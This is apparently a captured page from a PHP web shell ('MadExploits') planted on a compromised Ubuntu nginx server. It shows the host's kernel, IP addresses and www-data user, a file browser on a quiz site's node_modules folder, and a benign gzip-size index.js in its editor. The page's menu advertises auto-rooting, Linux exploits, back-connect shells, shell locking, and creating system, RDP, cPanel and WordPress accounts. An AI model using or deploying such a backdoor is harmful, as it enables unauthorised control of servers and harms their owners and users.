Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
gzip-size /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
2.76
KB
-rw-rw-rw-
index.js
1.43
KB
-rw-rw-rw-
license
1.09
KB
-rw-rw-rw-
package.json
727
B
-rw-rw-rw-
readme.md
1.75
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict'; const fs = require('fs'); const stream = require('stream'); const zlib = require('zlib'); const {promisify} = require('util'); const duplexer = require('duplexer'); const getOptions = options => ({level: 9, ...options}); const gzip = promisify(zlib.gzip); module.exports = async (input, options) => { if (!input) { return 0; } const data = await gzip(input, getOptions(options)); return data.length; }; module.exports.sync = (input, options) => zlib.gzipSync(input, getOptions(options)).length; module.exports.stream = options => { const input = new stream.PassThrough(); const output = new stream.PassThrough(); const wrapper = duplexer(input, output); let gzipSize = 0; const gzip = zlib.createGzip(getOptions(options)) .on('data', buf => { gzipSize += buf.length; }) .on('error', () => { wrapper.gzipSize = 0; }) .on('end', () => { wrapper.gzipSize = gzipSize; wrapper.emit('gzip-size', gzipSize); output.end(); }); input.pipe(gzip); input.pipe(output, {end: false}); return wrapper; }; module.exports.file = (path, options) => { return new Promise((resolve, reject) => { const stream = fs.createReadStream(path); stream.on('error', reject); const gzipStream = stream.pipe(module.exports.stream(options)); gzipStream.on('error', reject); gzipStream.on('gzip-size', resolve); }); }; module.exports.fileSync = (path, options) => module.exports.sync(fs.readFileSync(path), options);
Close